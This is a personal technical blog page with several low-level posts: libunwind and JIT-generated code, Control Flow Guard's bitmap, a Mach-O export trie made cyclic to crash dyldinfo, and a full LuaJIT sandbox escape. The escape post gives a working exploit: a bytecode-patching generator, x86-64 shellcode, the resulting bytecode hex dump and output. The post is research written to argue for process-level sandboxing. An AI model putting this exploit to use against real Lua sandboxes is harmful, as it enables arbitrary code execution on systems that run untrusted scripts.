Sometimes I talk about LuaJIT

Back in October, I gave a talk at the 2016 Lua Workshop about some of the internals of LuaJIT. Videos from the workshop are now online, so if you're able to stand 40 minutes of me talking, and have an interest in the implementation of LuaJIT, you might like the following:

On libunwind and dynamically generated code on x86-64

libunwind is a - supposedly portable - library for performing native stack unwinding. In simple scenarios, the library does its job fairly well, however, things get more interesting in the presence of dynamically-generated (vis-à-vis JIT-compiled) code. In fact, on any platform, and in any context, unwinding native stacks in the presence of dynamically-generated code is an interesting topic. It so happens that the Windows API gets this right, presenting you with two different options, with it being sufficient to go with either option:

  1. Construct some RUNTIME_FUNCTION data structures up front, and then call RtlAddFunctionTable.
  2. Call RtlInstallFunctionTableCallback, and then construct RUNTIME_FUNCTION data structures lazily on demand (this is exactly the interface that a JIT compiler would want, and perhaps it was designed with one in mind).

I feel that Linux doesn't really get this right. Rather than there being a single OS-supplied interface, every tool has its own way of doing things:

All three of these interfaces require data structures to be generated up-front, which isn't ideal for JIT compilers, but I digress (though possibly in some cases, creative use of PROT_NONE pages and SIGSEGV handlers could allow some degree of lazy on-demand generation). That all three interfaces consume different data is annoying. That .eh_frame and .debug_frame are subtly different is also annoying, but I digress again.

Though libunwind presents an interface, it happens to be poorly documented and poorly implemented for x86-64. In particular, if you read the documentation, then you'd be left with the impression that unw_dyn_info_t can refer to either a unw_dyn_proc_info_t structure (UNW_INFO_FORMAT_DYNAMIC), or a unw_dyn_table_info structure (UNW_INFO_FORMAT_REMOTE_TABLE or UNW_INFO_FORMAT_TABLE). On the former structure, the documentation has the following to say:

This is the preferred dynamic unwind-info format and it is generally the one used by full-blown runtime code-generators. In this format, the details of a procedure are described by a structure of type unw_dyn_proc_info_t.

Let me save you some time by pointing out that unwind directives for unw_dyn_proc_info_t structures plain aren't implemented on x86-64. As such, using unw_dyn_proc_info_t is a non-starter if you actually want to do any unwinding. Consequently, the only option is to use unw_dyn_table_info. The most interesting field of unw_dyn_table_info is table_data, the documentation for which states:

A pointer to the actual data encoding the unwind-info. The exact format is architecture-specific (see architecture-specific sections below).

Of course, there are no such notes below with reference to x86-64. Let me save you some time by pointing out that the table_data field should refer to an array of table_entry structures (which aren't documented, or present in any header, but can be found in the source). In turn, the fde_offset field of that structure should refer to a DWARF FDE in .debug_frame style.

After supplying unwind information via UNW_INFO_FORMAT_TABLE, libunwind is capable of unwinding over call frames for dynamically-generated code on x86-64. After getting basic unwinding working, one might like to make libunwind supply a useful function name for the call frame. The unw_dyn_table_info structure contains a name_ptr field which looks perfect for this task, but the code which should read this field instead just returns UNW_ENOINFO for UNW_INFO_FORMAT_TABLE (or, it would, but UNW_EINVAL is also likely, as the enclosing switch statement should be on pi.format rather than di->format). The observant reader will spot that this name-related logic is fully implemented for UNW_INFO_FORMAT_DYNAMIC, leaving us in a sad situation on x86-64: use UNW_INFO_FORMAT_DYNAMIC and get names but no unwinding, or use UNW_INFO_FORMAT_TABLE and get unwinding but no names.

I'd like to finish on a positive note instead of that sad note, but alas, this is a tale of woe.

Malicious LuaJIT bytecode

I have previously written about how malicious bytecode can be used to escape from a Lua 5.1 sandbox on 32-bit Windows, and other people have applied the same methods to attack redis instances.

It should come as no surprise that LuaJIT (as opposed to plain PUC-Rio non-JIT Lua) also has bytecode which can be used to escape from sandboxes, but it is nevertheless illustrative to work through the details of a full sandbox escape. The conclusion, as should be accepted knowledge by now, is that Lua should be sandboxed at the operating-system-process level, as opposed to at the Lua level.

For the purposes of this exercise, we'll escape from the following sandbox:

#include <lauxlib.h>
#include <lualib.h>

int main() {
  lua_State* L = luaL_newstate();
  lua_cpcall(L, luaopen_jit, NULL);
  luaL_dofile(L, "evil.lua");
  lua_close(L);
}

The sandbox executes arbitrary Lua code of our choice (the evil.lua file), and our aim is to escalate up to executing arbitrary native code of our choice. If the sandbox exposed LuaJIT's standard ffi library, then this would be trivial: call ffi.cdef to declare a prototype for mprotect (or VirtualProtect on Windows), call mprotect on some shellcode to make it executable, call ffi.cast to get a function pointer for the shellcode, and then call the function pointer. Of course, the sandbox does not expose the ffi library - nor does it expose the base library (hence no tostring or print or etc.) or the package library (no require) or the string library (no string manipulation) or any other useful library. As its sole concession, the sandbox does load the jit library, as this library must be loaded in order for LuaJIT to actually do JIT compilation.

The particular environment we'll attack is LuaJIT commit 4f87367b (head of the v2.1 branch at time of writing), running on an x86_64 flavour of either Mac OSX or Linux, and compiled with LJ_64=1 and LJ_GC64=0 and LJ_FR2=0 (these being the current defaults for LuaJIT on x86_64).

The evil.lua file that we'll end up using will contain LuaJIT bytecode rather than Lua source code. Writing bytecode by hand is somewhat arduous, so instead we'll write Lua source code, compile it to bytecode, and then make a few surgical tweaks to the bytecode. The following rather long block of contains both the Lua source code to be compiled and manipulated, and the Lua source code for performing the compilation and manipulation.

-- The following function serves as the template for evil.lua.
-- The general outline is to compile this function as-written, dump
-- it to bytecode, manipulate the bytecode a bit, and then save the
-- result as evil.lua.
local evil = function(v)
  -- This is the x86_64 native code which we'll execute. It
  -- is a very benign payload which just prints "Hello World"
  -- and then fixes up some broken state.
  local shellcode =
    "\76\139\87\16"..       -- mov r10, [rdi+16]
    "\184\4\0\0\2"..        -- mov eax, 0x2000004
    "\191\1\0\0\0"..        -- mov edi, 1
    "\72\141\53\51\0\0\0".. -- lea rsi, [->msg]
    "\186\12\0\0\0"..       -- mov edx, 12
    "\15\5"..               -- syscall
    "\72\133\192"..         -- test rax, rax
    "\184\74\0\0\2"..       -- mov eax, 0x200004a
    "\121\12"..             -- jns ->is_osx
    "\184\1\0\0\0"..        -- mov eax, 1
    "\15\5"..               -- syscall
    "\184\10\0\0\0"..       -- mov eax, 10
                            -- ->is_osx:
    "\73\139\58"..          -- mov rdi, [r10]
    "\72\139\119\8"..       -- mov rsi, [rdi+8]
    "\186\7\0\0\0"..        -- mov edx, 7
    "\15\5"..               -- syscall
    "\73\139\114\8"..       -- mov rsi, [r10+8]
    "\72\137\55"..          -- mov [rdi], rsi
    "\195"..                -- ret
                            -- ->msg:
    "Hello World\n"

  -- The dirty work is done by the following "inner" function.
  -- This inner function exists because we require a vararg call
  -- frame on the Lua stack, and for the function associated with
  -- said frame to have certain special upvalues.
  local function inner(...)
    if false then
      -- The following three lines turn into three bytecode
      -- instructions. We munge the bytecode slightly, and then
      -- later reinterpret the instructions as a cdata object,
      -- which will end up being `cdata<const char *>: NULL`.
      -- The `if false` wrapper ensures that the munged bytecode
      -- isn't executed.
      local cdata = -32749
      cdata = 0
      cdata = 0
    end

    -- Through the power of bytecode manipulation, the
    -- following three functions will become (the fast paths of)
    -- string.byte, string.char, and string.sub. This is
    -- possible because LuaJIT has bytecode instructions
    -- corresponding to the fast paths of said functions. Note
    -- that we musn't stray from the fast path (because the
    -- fallback C code won't be wired up). Also note that the
    -- interpreter state will be slightly messed up after
    -- calling one of these functions.
    local function s_byte(s) end
    local function s_char(i, _) end
    local function s_sub(s, i, j) end

    -- The following function does nothing, but calling it will
    -- restore the interpreter state which was messed up following
    -- a call to one of the previous three functions. Because this
    -- function contains a cdata literal, loading it from bytecode
    -- will result in the ffi library being initialised (but not
    -- registered in the global namespace).
    local function resync() return 0LL end

    -- Helper function to reinterpret the first four bytes of a
    -- string as a uint32_t, and return said value as a number.
    local function s_uint32(s)
      local result = 0
      for i = 4, 1, -1 do
        result = result * 256 + s_byte(s_sub(s, i, i))
        resync()
      end
      return result
    end

    -- The following line obtains the address of the GCfuncL
    -- object corresponding to "inner". As written, it just fetches
    -- the 0th upvalue, and does some arithmetic. After some
    -- bytecode manipulation, the 0th upvalue ends up pointing
    -- somewhere very interesting: the frame info TValue containing
    -- func|FRAME_VARG|delta. Because delta is small, this TValue
    -- will end up being a denormalised number, from which we can
    -- easily pull out 32 bits to give us the "func" part.
    local iaddr = (inner * 2^1022 * 2^52) % 2^32

    -- The following five lines read the "pc" field of the GCfuncL
    -- we just obtained. This is done by creating a GCstr object
    -- overlaying the GCfuncL, and then pulling some bytes out of
    -- the string. Bytecode manipulation results in a nice KPRI
    -- instruction which preserves the low 32 bits of the istr
    -- TValue while changing the high 32 bits to specify that the
    -- low 32 bits contain a GCstr*.
    local istr = (iaddr - 4) + 2^52
    istr = -32764 -- Turned into KPRI(str)
    local pc = s_sub(istr, 5, 8)
    istr = resync()
    pc = s_uint32(pc)

    -- The following three lines result in the local variable
    -- called "memory" being `cdata<const char *>: NULL`. We can
    -- subsequently use this variable to read arbitrary memory
    -- (one byte at a time). Note again the KPRI trick to change
    -- the high 32 bits of a TValue. In this case, the low 32 bits
    -- end up pointing to the bytecode instructions at the top of
    -- this function wrapped in `if false`.
    local memory = (pc + 8) + 2^52
    memory = -32758 -- Turned into KPRI(cdata)
    memory = memory + 0

    -- Helper function to read a uint32_t from any memory location.
    local function m_uint32(offs)
      local result = 0
      for i = offs + 3, offs, -1 do
        result = result * 256 + (memory[i] % 256)
      end
      return result
    end

    -- Helper function to extract the low 32 bits of a TValue.
    -- In particular, for TValues containing a GCobj*, this gives
    -- the GCobj* as a uint32_t. Note that the two memory reads
    -- here are GCfuncL::uvptr[1] and GCupval::v.
    local vaddr = m_uint32(m_uint32(iaddr + 24) + 16)
    local function low32(tv)
      v = tv
      return m_uint32(vaddr)
    end

    -- Helper function which is the inverse of s_uint32: given a
    -- 32 bit number, returns a four byte string.
    local function ub4(n)
      local result = ""
      for i = 0, 3 do
        local b = n % 256
        n = (n - b) / 256
        result = result .. s_char(b)
        resync()
      end
      return result
    end

    -- The following four lines result in the local variable
    -- called "mctab" containing a very special table: the
    -- array part of the table points to the current Lua
    -- universe's jit_State::patchins field. Consequently,
    -- the table's [0] through [4] fields allow access to the
    -- mcprot, mcarea, mctop, mcbot, and szmcarea fields of
    -- the jit_State. Note that LuaJIT allocates the empty
    -- string within global_State, so a fixed offset from the
    -- address of the empty string gives the fields we're
    -- after within jit_State.
    local mctab_s = "\0\0\0\0\99\4\0\0".. ub4(low32("") + 2748)
      .."\0\0\0\0\0\0\0\0\0\0\0\0\5\0\0\0\255\255\255\255"
    local mctab = low32(mctab_s) + 16 + 2^52
    mctab = -32757 -- Turned into KPRI(table)

    -- Construct a string consisting of 4096 x86 NOP instructions.
    local nop4k = "\144"
    for i = 1, 12 do nop4k = nop4k .. nop4k end

    -- Create a copy of the shellcode which is page aligned, and
    -- at least one page big, and obtain its address in "asaddr".
    local ashellcode = nop4k .. shellcode .. nop4k
    local asaddr = low32(ashellcode) + 16
    asaddr = asaddr + 2^12 - (asaddr % 2^12)

    -- The following seven lines result in the memory protection of
    -- the page at asaddr changing from read/write to read/execute.
    -- This is done by setting the jit_State::mcarea and szmcarea
    -- fields to specify the page in question, setting the mctop and
    -- mcbot fields to an empty subrange of said page, and then
    -- triggering some JIT compilation. As a somewhat unfortunate
    -- side-effect, the page at asaddr is added to the jit_State's
    -- linked-list of mcode areas (the shellcode unlinks it).
    local mcarea = mctab[1]
    mctab[0] = 0
    mctab[1] = asaddr / 2^52 / 2^1022
    mctab[2] = mctab[1]
    mctab[3] = mctab[1]
    mctab[4] = 2^12 / 2^52 / 2^1022
    while mctab[0] == 0 do end

    -- The following three lines construct a GCfuncC object
    -- whose lua_CFunction field is set to asaddr. A fixed
    -- offset from the address of the empty string gives us
    -- the global_State::bc_cfunc_int field.
    local fshellcode = ub4(low32("") + 132) .."\0\0\0\0"..
      ub4(asaddr) .."\0\0\0\0"
    fshellcode = -32760 -- Turned into KPRI(func)

    -- Finally, we invoke the shellcode (and pass it some values
    -- which allow it to remove the page at asaddr from the list
    -- of mcode areas).
    fshellcode(mctab[1], mcarea)
  end
  inner()
end

-- Some helpers for manipulating bytecode:
local ffi = require "ffi"
local bit = require "bit"
local BC = {KSHORT = 41, KPRI = 43}

-- Dump the as-written evil function to bytecode:
local estr = string.dump(evil, true)
local buf = ffi.new("uint8_t[?]", #estr+1, estr)
local p = buf + 5

-- Helper function to read a ULEB128 from p:
local function read_uleb128()
  local v = p[0]; p = p + 1
  if v >= 128 then
    local sh = 7; v = v - 128
    repeat
      local r = p[0]
      v = v + bit.lshift(bit.band(r, 127), sh)
      sh = sh + 7
      p = p + 1
    until r < 128
  end
  return v
end

-- The dumped bytecode contains several prototypes: one for "evil"
-- itself, and one for every (transitive) inner function. We step
-- through each prototype in turn, and tweak some of them.
while true do
  local len = read_uleb128()
  if len == 0 then break end
  local pend = p + len
  local flags, numparams, framesize, sizeuv = p[0], p[1], p[2], p[3]
  p = p + 4
  read_uleb128()
  read_uleb128()
  local sizebc = read_uleb128()
  local bc = p
  local uv = ffi.cast("uint16_t*", p + sizebc * 4)
  if numparams == 0 and sizeuv == 3 then
    -- This branch picks out the "inner" function.
    -- The first thing we do is change what the 0th upvalue
    -- points at:
    uv[0] = uv[0] + 2
    -- Then we go through and change everything which was written
    -- as "local_variable = -327XX" in the source to instead be
    -- a KPRI instruction:
    for i = 0, sizebc do
      if bc[0] == BC.KSHORT then
        local rd = ffi.cast("int16_t*", bc)[1]
        if rd <= -32749 then
          bc[0] = BC.KPRI
          bc[3] = 0
          if rd == -32749 then
            -- the `cdata = -32749` line in source also tweaks
            -- the two instructions after it:
            bc[4] = 0
            bc[8] = 0
          end
        end
      end
      bc = bc + 4
    end
  elseif sizebc == 1 then
    -- As written, the s_byte, s_char, and s_sub functions each
    -- contain a single "return" instruction. We replace said
    -- instruction with the corresponding fast-function instruction.
    bc[0] = 147 + numparams
    bc[2] = bit.band(1 + numparams, 6)
  end
  p = pend
end

-- Finally, save the manipulated bytecode as evil.lua:
local f = io.open("evil.lua", "wb")
f:write(ffi.string(buf, #estr))
f:close()

If we save the above as make_evil.lua, then we can execute it to create evil.lua:

$ luajit make_evil.lua
$ file evil.lua
evil.lua: data
$ xxd evil.lua 
0000000: 1b4c 4a02 060b 0001 0100 0000 0194 0002  .LJ.............
0000010: 000b 0002 0200 0000 0195 0002 000b 0003  ................
0000020: 0300 0000 0196 0004 0012 0400 0100 0100  ................
0000030: 0228 0000 004c 0002 0002 0000 5700 010c  .(...L......W...
0000040: 0300 0112 2901 0000 2902 0400 2903 0100  ....)...)...)...
0000050: 2904 ffff 4d02 0c80 1806 0001 2d07 0000  )...M.......-...
0000060: 2d08 0100 1209 0000 120a 0500 120b 0500  -...............
0000070: 4208 0400 4107 0002 2001 0706 2d06 0200  B...A... ...-...
0000080: 4206 0101 4f02 f47f 4c01 0200 00c0 02c0  B...O...L.......
0000090: 03c0 8004 3c00 0108 0100 020c 2901 0000  ....<.......)...
00000a0: 1602 0000 1203 0000 2904 ffff 4d02 0680  ........)...M...
00000b0: 1806 0101 2d07 0000 3807 0507 1a07 0107  ....-...8.......
00000c0: 2001 0706 4f02 fa7f 4c01 0200 0880 0680   ...O...L.......
00000d0: 041d 0001 0303 0000 042e 0000 002d 0101  .............-..
00000e0: 002d 0202 0044 0102 0001 0009 c00a c052  .-...D.........R
00000f0: 0001 0a02 0101 1127 0100 0029 0200 0029  .......'...)...)
0000100: 0303 0029 0401 004d 020b 801a 0600 0021  ...)...M.......!
0000110: 0706 0019 0000 0712 0701 002d 0800 0012  ...........-....
0000120: 0906 0042 0802 0226 0108 072d 0701 0042  ...B...&...-...B
0000130: 0701 014f 02f5 7f4c 0102 0001 c003 c005  ...O...L........
0000140: 8004 9f04 0700 1703 0d0c 7158 0000 8058  ..........qX...X
0000150: 0003 802b 0013 0000 0000 0000 0000 0033  ...+...........3
0000160: 0000 0033 0101 0033 0202 0033 0303 0033  ...3...3...3...3
0000170: 0404 002d 0500 0018 0500 0518 0501 051a  ...-............
0000180: 0502 0517 0603 0516 0601 062b 0604 0012  ...........+....
0000190: 0702 0012 0806 0029 0905 0029 0a08 0042  .......)...)...B
00001a0: 0704 0212 0803 0042 0801 0212 0608 0012  .......B........
00001b0: 0804 0012 0907 0042 0802 0212 0708 0016  .......B........
00001c0: 0804 0716 0801 082b 080a 0016 0805 0833  .......+.......3
00001d0: 0905 0012 0a09 0012 0b09 0016 0c06 0542  ...............B
00001e0: 0b02 0216 0b07 0b42 0a02 0233 0b06 0033  .......B...3...3
00001f0: 0c07 0027 0d08 0012 0e0c 0012 0f0b 0027  ...'...........'
0000200: 1009 0042 0f02 0216 0f08 0f42 0e02 0227  ...B.......B...'
0000210: 0f0a 0026 0d0f 0d12 0e0b 0012 0f0d 0042  ...&...........B
0000220: 0e02 0216 0e07 0e16 0e01 0e2b 0e0b 0027  ...........+...'
0000230: 0f0b 0029 1001 0029 110c 0029 1201 004d  ...)...)...)...M
0000240: 1004 8012 140f 0012 150f 0026 0f15 144f  ...........&...O
0000250: 10fc 7f12 100f 002d 1102 0012 120f 0026  .......-.......&
0000260: 1012 1012 110b 0012 1210 0042 1102 0216  ...........B....
0000270: 1107 1116 1209 111a 1309 1121 1113 123a  ...........!...:
0000280: 1201 0e29 1300 003e 1300 0e19 1301 1119  ...)...>........
0000290: 1300 133e 1301 0e3a 1301 0e3e 1302 0e3a  ...>...:...>...:
00002a0: 1301 0e3e 1303 0e2a 130a 003e 1304 0e3a  ...>...*...>...:
00002b0: 1300 0e09 1305 0058 1302 8055 1301 8058  .......X...U...X
00002c0: 13fb 7f12 130c 0012 140b 0027 1509 0042  ...........'...B
00002d0: 1402 0216 140b 1442 1302 0227 140c 0012  .......B...'....
00002e0: 150c 0012 1611 0042 1502 0227 160c 0026  .......B...'...&
00002f0: 1316 132b 1308 0012 1413 003a 1501 0e12  ...+.......:....
0000300: 1612 0042 1403 0132 0000 804b 0001 0004  ...B...2...K....
0000310: c000 8001 c009 0000 0000 0690 1900 0000  ................
0000320: 0000 0000 0000 0000 0005 0000 00ff ffff  ................
0000330: ff05 0d00 0000 0063 0400 0000 0000 0000  .......c........
0000340: 0000 0001 8080 c0fe 0701 8080 c099 0401  ................
0000350: 8080 c08f 0408 1000 3020 f82a 8040 8140  ........0 .*.@.@
0000360: 0088 02d2 0105 0115 0013 001a 2701 0000  ............'...
0000370: 2702 0100 2703 0200 2704 0300 2705 0400  '...'...'...'...
0000380: 2706 0500 2707 0600 2708 0700 2709 0800  '...'...'...'...
0000390: 270a 0900 270b 0500 270c 0a00 270d 0b00  '...'...'...'...
00003a0: 270e 0c00 270f 0d00 2710 0500 2711 0e00  '...'...'...'...
00003b0: 2712 0f00 2713 1000 2714 1100 2601 1401  '...'...'...&...
00003c0: 3302 1200 1203 0200 4203 0101 3200 0080  3.......B...2...
00003d0: 4b00 0100 0011 4865 6c6c 6f20 576f 726c  K.....Hello Worl
00003e0: 640a 06c3 0848 8937 0949 8b72 080a ba07  d....H.7.I.r....
00003f0: 0000 0009 488b 7708 0849 8b3a 0ab8 0a00  ....H.w..I.:....
0000400: 0000 0ab8 0100 0000 0779 0c0a b84a 0000  .........y...J..
0000410: 0208 4885 c007 0f05 0aba 0c00 0000 0c48  ..H............H
0000420: 8d35 3300 0000 0abf 0100 0000 0ab8 0400  .53.............
0000430: 0002 094c 8b57 1000                      ...L.W..

We can then run evil.lua either in our sandbox, or in luajit proper. Let's start with the latter:

$ luajit evil.lua
Hello World

Running evil.lua in our sandbox first requires that we compile and build the sandbox. Ensuring that you link against the correct version of LuaJIT can be fiddly, as can forcing the correct address space layout on OSX. Once your environment is set up correctly, this can be as simple as:

$ gcc sandbox.c -lluajit # On OSX, also pass:
                         # -pagezero_size  10000
                         # -image_base 100000000
$ ./a.out
Hello World

With that, we've seen that malicious LuaJIT bytecode can be used to escape from the tightest of Lua-level sandboxes, and result in arbitrary native code execution.

Control flow guard

Microsoft recently introduced a new security feature called Control Flow Guard. At a basic level, this feature consists of a massive bit vector, and before any indirect function call is performed, the bit vector is consulted to determine whether the target of the call is valid or not. The end-goal is that the bit vector should specify all function entry addresses as valid, and all other addresses as invalid - thereby preventing malicious calls into the middle of functions. The structure of the bit vector is interesting, but most literature seems to get it wrong. For example, the Trend Micro report on Control Flow Guard states:

The status of every 8 bytes in the process space corresponds to a bit in CFGBitmap. If there is a function starting address in each group of 8 bytes, the corresponding bit in CFGBitmap is set to 1; otherwise it is set to 0.

Every bit in the CFGBitmap represents eight bytes in the process space. So if an invalid target call address has less than eight bytes from the valid function address, the CFG will think the target call address is "valid."

Meanwhile, a POC2014 conference talk states:

One bit indicates 8bytes address and actually in most cases 16bytes
Every guard function address needs to be aligned to 0x10
If function address is not aligned to 0x10, it will use the odd bit only

In the bit vector (which Trend Micro calls CFGBitmap), every two bits correspond to sixteen bytes. Therefore, on average, every bit corresponds to eight bytes. However, the average is very misleading here, as in reality one of those two bits corresponds to one byte, and the other bit corresponds to fifteen bytes. This arrangement has several benefits:

Exporting an infinite number of symbols

Dynamically loadable shared libraries typically come in one of a few formats:

The whole point of dynamically loadable shared libraries is to export symbols, and these formats typically store exported symbol information as a list of exported symbols or a hash table of exported symbols. One nice property of lists and hash tables is that they're finite by default: unless you deliberately try to make them infinite, they'll be finite.

One oddity of the Mach-O format is that exported symbol information can be represented as a trie. The term trie is meant to allude to tree, and trees are also finite by default. However, a trie can also be thought of as a directed rooted graph, and if that graph were to have a cycle, then the number of paths in the graph would be infinite.

Let us begin with a file called finite.c:

void corsix() {}
void corsix_() {}

#define C2(x) void corsix_##x() {}
#define C1(x) C2(x##a) C2(x##b) C2(x##c) C2(x##d) C2(x##e)
#define C0(x) C1(x##a) C1(x##b) C1(x##c) C1(x##d) C1(x##e)
C0(a) C0(b) C0(c) C0(d) C0(e)

We can compile this to a shared library like so:

$ clang finite.c -shared -o finite.dylib

This gives us a shared library called finite.dylib which exports 127 symbols: corsix, corsix_, and the 125 symbols matching the regex corsix_[a-e][a-e][a-e]. These symbols aren't overly interesting, and the sheer number of symbols is merely to ensure that the exported symbol trie in finite.dylib occupies sufficiently many bytes.

The exported symbol trie in finite.dylib looks something like the following diagram:

                                         +-"a"-> corsix_a ...
                                         |
                                         +-"b"-> corsix_b ...
                                         |
root -"_corsix"-> corsix -"_"-> corsix_ -+-"c"-> corsix_c ...
                                         |
                                         +-"d"-> corsix_d ...
                                         |
                                         +-"e"-> corsix_e ...

Our aim is to replace the exported symbol trie with something like the following diagram:

                +- <---"_"---+
                |            |
root -"_corsix"-+-> corsix --+
                |            |
                +- <---"a"---+
                |            |
                +- <---"b"---+
                |            |
                +- <---"c"---+
                |            |
                +- <---"d"---+
                |            |
                +- <---"e"---+

With such a trie, the symbol originally called corsix should now be exported under all the names matching the regex corsix[_a-e]*. We could also go slightly further, adding more looping edges to the trie, in order to reach corsix[_a-z0-9]*.

We'll use the following transform.lua program to do the dirty work of trie replacement:

dylib = io.read"*a"
nof, pos, tsz = dylib:match"_corsix%z(.)()(.)"
node = dylib:sub(pos, pos + tsz:byte()) .. "\37" ..
  ("_abcdefghijklmnopqrstuvwxyz0123456789"):gsub(".", "%0\0" .. nof)
io.write(dylib:sub(1, pos-1) .. node .. dylib:sub(pos + #node))

Running the program like so will generate a file called infinite.dylib:

$ lua transform.lua <finite.dylib >infinite.dylib

We'll then use the following client.cpp program to query the exported symbols of the two .dylib files:

#include <dlfcn.h>
#include <stdio.h>

void check_dylib(const char* path) {
  void* dylib = dlopen(path, RTLD_LOCAL);
  printf("\nName lookup results in %s:\n", path);
  const char* names[] = {
    "foobar23", "corsix", "corsix_aaa", "corsix_abc",
    "corsix_xyz", "corsix_foobar23", "corsix_dot_org"
  };
  for (const char* name : names) {
    printf("%-15s -> %p\n", name, dlsym(dylib, name));
  }
}

int main() {
  check_dylib("./finite.dylib");
  check_dylib("./infinite.dylib");
  return 0;
}

Compiling and running gives the following output:

$ clang -std=c++11 client.cpp && ./a.out

Name lookup results in ./finite.dylib:
foobar23        -> 0x0
corsix          -> 0x1076347b0
corsix_aaa      -> 0x1076347d0
corsix_abc      -> 0x107634840
corsix_xyz      -> 0x0
corsix_foobar23 -> 0x0
corsix_dot_org  -> 0x0

Name lookup results in ./infinite.dylib:
foobar23        -> 0x0
corsix          -> 0x1076377b0
corsix_aaa      -> 0x1076377b0
corsix_abc      -> 0x1076377b0
corsix_xyz      -> 0x1076377b0
corsix_foobar23 -> 0x1076377b0
corsix_dot_org  -> 0x1076377b0

I don't know of any particularly useful reason for exporting an infinite number of symbols, but it does trip up Apple's dyldinfo tool, and it might also trip up other tools of a similar nature:

$ dyldinfo -export infinite.dylib 
export information (from trie):
Segmentation fault: 11

$ dyldinfo -export_dot infinite.dylib
digraph {
  node000;
  node000 -> node011 [ label=_corsix ] ;
  node011 [ label=_corsix,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix_,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix__,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix___,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix____,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix_____,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix______,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix_______,addr0x000007B0 ];
  node011 -> node011 [ label=_ ] ;
  node011 [ label=_corsix________,addr0x000007B0 ];
... 15000 lines of output ommitted ...
Segmentation fault: 11
page: 8 9 10 11 12